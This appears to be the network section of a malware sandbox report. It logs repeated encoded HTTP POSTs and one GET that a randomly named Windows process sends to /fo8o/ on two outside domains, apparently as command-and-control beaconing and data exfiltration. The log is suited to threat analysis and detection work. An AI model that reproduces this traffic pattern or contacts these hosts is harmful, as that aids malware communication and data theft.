MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	202.172.28.202	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:14:59.626684904 CEST	776	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.kasegitai.tokyo Origin: http://www.kasegitai.tokyo Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 199 Referer: http://www.kasegitai.tokyo/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 66 6b 32 76 35 52 35 2f 76 72 4d 41 46 48 55 74 46 78 65 6f 65 77 36 43 2b 6b 42 51 62 2f 41 4c 52 41 3d 3d Data Ascii: aZ=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmffk2v5R5/vrMAFHUtFxeoew6C+kBQb/ALRA==
Jun 8, 2024 18:15:00.910419941 CEST	360	IN	HTTP/1.1 404 Not Found Date: Sat, 08 Jun 2024 16:15:00 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	202.172.28.202	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:15:02.155886889 CEST	796	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.kasegitai.tokyo Origin: http://www.kasegitai.tokyo Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 219 Referer: http://www.kasegitai.tokyo/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 49 38 6e 70 39 55 49 68 6c 42 43 51 64 6e 62 6c 39 4b 6c 56 2b 79 55 57 5a 2f 75 56 2f 4b 5a 72 6c 52 67 5a 6e 67 57 64 73 44 35 32 6e 7a 57 4c 39 67 41 53 68 42 78 56 6e 79 51 45 74 35 72 53 55 34 69 6d 36 6c 68 38 71 66 79 69 6e 77 68 47 74 4a 4f 31 47 62 49 4d 4c 68 67 6f 42 69 70 58 65 67 55 46 2b 53 68 63 32 75 4f 6d 57 45 70 6a 35 6f 58 71 59 57 53 79 67 41 74 4d 50 2b 68 7a 47 74 66 43 58 30 50 61 42 45 41 32 67 4a 48 61 44 4f 48 6d 52 31 50 77 32 41 35 34 68 4a 59 2f 45 42 46 33 55 41 2f 2f 4d 77 65 78 6a 6a 49 6b 57 38 39 43 4b 4d 5a 66 4e 68 42 64 6f 35 63 66 67 68 47 53 52 76 49 54 58 39 30 3d Data Ascii: aZ=5JlKLzaKVp1wI8np9UIhlBCQdnbl9KlV+yUWZ/uV/KZrlRgZngWdsD52nzWL9gAShBxVnyQEt5rSU4im6lh8qfyinwhGtJO1GbIMLhgoBipXegUF+Shc2uOmWEpj5oXqYWSygAtMP+hzGtfCX0PaBEA2gJHaDOHmR1Pw2A54hJY/EBF3UA//MwexjjIkW89CKMZfNhBdo5cfghGSRvITX90=
Jun 8, 2024 18:15:03.339610100 CEST	360	IN	HTTP/1.1 404 Not Found Date: Sat, 08 Jun 2024 16:15:03 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49740	202.172.28.202	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:15:04.687427044 CEST	10878	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.kasegitai.tokyo Origin: http://www.kasegitai.tokyo Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10299 Referer: http://www.kasegitai.tokyo/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 49 38 6e 70 39 55 49 68 6c 42 43 51 64 6e 62 6c 39 4b 6c 56 2b 79 55 57 5a 2f 75 56 2f 4a 35 72 6c 6a 6f 5a 6d 48 43 64 2b 54 35 32 6b 7a 57 62 39 67 42 4f 68 46 64 5a 6e 79 55 36 74 36 54 53 57 62 36 6d 72 77 56 38 35 2f 79 69 34 41 68 46 77 5a 4f 67 47 62 59 41 4c 67 51 6f 42 69 70 58 65 6c 51 46 39 48 64 63 37 4f 4f 6c 58 45 70 6b 39 6f 58 43 59 57 72 4b 67 41 35 63 4d 4b 74 7a 46 4e 50 43 55 47 6e 61 48 55 41 30 6a 4a 47 48 44 4f 4c 48 52 31 54 38 32 41 4e 65 68 4c 45 2f 41 56 6c 75 46 45 76 61 66 47 4f 43 31 45 6b 56 61 66 56 31 48 2b 49 6b 4b 6a 68 5a 72 59 41 53 6f 78 58 6e 57 4e 73 70 4e 62 64 62 47 57 4e 35 33 62 32 47 63 2f 57 71 46 6a 52 35 78 62 6d 48 78 65 69 51 6f 32 45 61 62 30 4a 6f 6c 4f 46 4c 6a 49 79 41 39 63 5a 55 6e 30 69 63 4e 4b 39 46 70 65 44 4d 2f 58 63 41 66 31 7a 55 6b 4b 6c 74 53 33 51 39 4f 77 63 50 73 51 2b 4b 64 72 2b 43 67 79 56 64 4e 6f 34 7a 61 34 53 77 2f 51 48 50 47 47 66 41 6a 77 2b 59 35 35 64 76 4e 74 43 32 59 53 4e [TRUNCATED] Data Ascii: aZ=5JlKLzaKVp1wI8np9UIhlBCQdnbl9KlV+yUWZ/uV/J5rljoZmHCd+T52kzWb9gBOhFdZnyU6t6TSWb6mrwV85/yi4AhFwZOgGbYALgQoBipXelQF9Hdc7OOlXEpk9oXCYWrKgA5cMKtzFNPCUGnaHUA0jJGHDOLHR1T82ANehLE/AVluFEvafGOC1EkVafV1H+IkKjhZrYASoxXnWNspNbdbGWN53b2Gc/WqFjR5xbmHxeiQo2Eab0JolOFLjIyA9cZUn0icNK9FpeDM/XcAf1zUkKltS3Q9OwcPsQ+Kdr+CgyVdNo4za4Sw/QHPGGfAjw+Y55dvNtC2YSNKuic7DQ4iT10QiVGqckJQbm6DPegwCtQhh4WulBqAacvsxY0a25Y9+zKUG42yNoXu4ju9sCZFNk1lo0dI6YGfF7/7H3q5adljciPwCW0kX3jvCkD4q9ZyRURKthdoV+r6cFVopM4tjtEZ01s/uaCQjzX3CGhw9Z/EwzaXMbjVj3kmand6EKtPtlotVVt88vpW9UKsTvFUbX5N1nmx7t4/a3VvYweWor/WOi06Rk679nfIQyaqy0YvK1wXWY/o6AHs0Qnp7/8xH78mkUla2F0anUuagmvBhC77HuZSxJuhrC/HRg+eEaW9YUQfnRKXqbpcapSDPQSeUMG8Lv8mJc+p9Ia4Ckiv8hFCwjXNrYvmc9IryWuOR/a9h+FqGAtlXV/VoH5eEIUyA0EMOWB9H39laXgFTtbkjBSNff+dSlM/eSBogxiJlRoo1pfQwArK1QHPu5cB0fcPAq6xDOsbIFlvTHPx0/lYNGF5QkZc2aEpzKwBA3FZ8bMwpfNq9gcj7IP2zYKFJAn8e6fw6J0/+SJ12DfczYIn+71Nl2vvePwPNSGlvEeoGhUEXf3D7NbEDvJJ/Q3ydB1Ham2F/YxVmD0vBYS9xfXRQZlJQ/s4WtM6ws4fVszi6kwVQiwWo5oAyOzZhAjdjlX6dmvvac3JAF8pv759C6QHOhkvd [TRUNCATED]
Jun 8, 2024 18:15:05.876883030 CEST	360	IN	HTTP/1.1 404 Not Found Date: Sat, 08 Jun 2024 16:15:05 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49741	202.172.28.202	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:15:07.220196009 CEST	499	OUT	GET /fo8o/?aZ=0LNqIGaAWMhMIMLOoFJdlTy9f3bq+Isr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8r/Gn91MhhIPQbbhzQEQvbiAlH2BixgYAz94=&qD=FrMTb HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.kasegitai.tokyo Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jun 8, 2024 18:15:08.436022043 CEST	360	IN	HTTP/1.1 404 Not Found Date: Sat, 08 Jun 2024 16:15:08 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49743	116.50.37.244	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:15:14.809267044 CEST	794	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 199 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 64 4c 4e 69 4b 4e 35 6c 6e 6e 59 57 6a 72 30 50 55 51 69 66 77 72 76 4a 78 5a 5a 4d 4e 6d 50 57 67 3d 3d Data Ascii: aZ=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfOdLNiKN5lnnYWjr0PUQifwrvJxZZMNmPWg==
Jun 8, 2024 18:15:16.063460112 CEST	599	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Location: https://www.goldenjade-travel.com/fo8o/ Server: Microsoft-IIS/10.0 Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS Access-Control-Allow-Credentials: true Date: Sat, 08 Jun 2024 16:15:15 GMT Connection: close Content-Length: 156 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6c 64 65 6e 6a 61 64 65 2d 74 72 61 76 65 6c 2e 63 6f 6d 2f 66 6f 38 6f 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49744	116.50.37.244	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:15:17.344849110 CEST	814	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 219 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 50 63 55 32 51 74 42 4f 62 47 4e 6b 77 72 32 43 59 67 38 41 68 2b 2f 4a 67 36 67 70 45 6a 72 56 55 3d Data Ascii: aZ=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwPcU2QtBObGNkwr2CYg8Ah+/Jg6gpEjrVU=
Jun 8, 2024 18:15:18.683131933 CEST	599	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Location: https://www.goldenjade-travel.com/fo8o/ Server: Microsoft-IIS/10.0 Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS Access-Control-Allow-Credentials: true Date: Sat, 08 Jun 2024 16:15:18 GMT Connection: close Content-Length: 156 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6c 64 65 6e 6a 61 64 65 2d 74 72 61 76 65 6c 2e 63 6f 6d 2f 66 6f 38 6f 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49745	116.50.37.244	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:15:19.878348112 CEST	10896	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10299 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 66 69 65 30 2f 78 4c 31 6c 5a 52 68 6e 6e 47 47 38 30 5a 50 75 46 57 32 34 52 38 33 5a 36 75 7a 68 41 38 70 49 79 36 71 70 35 32 67 37 47 6f 59 53 59 56 49 68 50 49 33 76 65 67 37 42 74 6a 76 48 74 63 6e 51 35 58 36 36 46 6f 2f 61 42 35 66 75 48 4b 75 73 68 32 58 31 32 56 6f 59 48 76 33 4f 77 2b 5a 55 2b 78 63 32 41 71 79 6c 65 38 74 45 58 6b 41 56 2f 49 78 6b 4a 66 6b 30 51 50 51 44 61 69 4c 6c 4c 55 6a 37 41 31 6e 65 50 54 4a 73 75 48 61 37 32 65 43 66 48 68 58 7a 6f 45 72 62 4a 49 37 70 [TRUNCATED] Data Ascii: aZ=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnfie0/xL1lZRhnnGG80ZPuFW24R83Z6uzhA8pIy6qp52g7GoYSYVIhPI3veg7BtjvHtcnQ5X66Fo/aB5fuHKush2X12VoYHv3Ow+ZU+xc2Aqyle8tEXkAV/IxkJfk0QPQDaiLlLUj7A1nePTJsuHa72eCfHhXzoErbJI7p0dZ0pvtJLPZCNBbfkZZuwld9LpKhkNEJcSFOpl0hwuQzM9OQ/06997bt03YSdIl1xfzR1paiBmgpgShwwcgWK2BHOIJ9pQzQmp/aD7JQSgbpKyX1LMz97dC3vpXT3T1LmfKc9RuG9FmNkX7rQVVFILVYi6fvP8mkfpU7Ub0LSpcQNjipOC0C/C+nZq/IVMWXhXRD53Din+vxQqiZwpVUJitjjiixIvySAQTu7i2pB2AbFWoNuRZF040YNoZpACYJlJyTbOftlZduaTAPmKC17B0A12pI4KZk94p8f7ouqcGtZpOv+7FgBiooP+OK41b6hivVy32G5UaAEsxSpFLYPJBxa1ZdR+vlj9IPg+HYBFaY3ZcsS4vBiQvd8+YEtGOTttG4kJLaib5p9RHFexGC5PDr6OwcxU/+X6wqyXE4SSRslpqvOvtYg54LeLHsKS7XiPqU35EdT52sfLN1AkWYVAqSNJ48HgNyqyX76+L+QJcUICRB5XPJiCkT4c5xhxV5sZh8T14Qm+BCAWAVGAb8okuU5+LbGl0CaMHYmni6NYZMRIBwwGzlHkVarquRdNwmCte0coo2aX+9i/xOFsUkIK3Ux/fgJ2rn0ElRR0LKiSxqU/5yT+uC1HI1lkflUrMhIcrcSKK5VXxofzw1KR7NuTOVYykvxW0Ox4 [TRUNCATED]
Jun 8, 2024 18:15:21.344163895 CEST	599	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Location: https://www.goldenjade-travel.com/fo8o/ Server: Microsoft-IIS/10.0 Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS Access-Control-Allow-Credentials: true Date: Sat, 08 Jun 2024 16:15:20 GMT Connection: close Content-Length: 156 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6c 64 65 6e 6a 61 64 65 2d 74 72 61 76 65 6c 2e 63 6f 6d 2f 66 6f 38 6f 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/">here</a>.</h2></body></html>

